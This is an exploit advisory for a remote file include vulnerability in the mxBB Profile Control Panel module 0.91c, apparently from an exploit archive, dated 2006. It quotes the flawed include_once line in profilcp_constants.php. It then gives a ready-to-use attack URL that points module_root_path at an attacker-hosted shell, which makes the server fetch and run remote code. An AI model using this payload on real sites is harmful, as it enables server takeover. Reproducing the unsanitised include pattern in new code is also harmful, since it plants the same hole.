id: 1244
date: 12/09/2006
title: mxBB Module Profile CP 0.91c Remote File Include Vulnerability
author: bd0rk
cves: 

==============================================================
mxBB Module Profile CP 0.91c Remote File Include Vulnerability
==============================================================



###############################################################################
##                                                                           ##
## mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability ##
##                                                                           ##
## Bugfound3R: bd0rk || SOH-Crew                                             ##
##                                                                           ##
## Greetz: Lu7k, TheJT, Natok                                                ##
##                                                                           ##
###############################################################################


==> Vulnerable Code in profilcp_constants.php <==

Code: include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx);

Usage: http://[y0uRSiTe]/[direct0ry]/includes/profilcp_constants.php?module_root_path=http://Sh3LL?



#  0day.today [2023-03-23]  #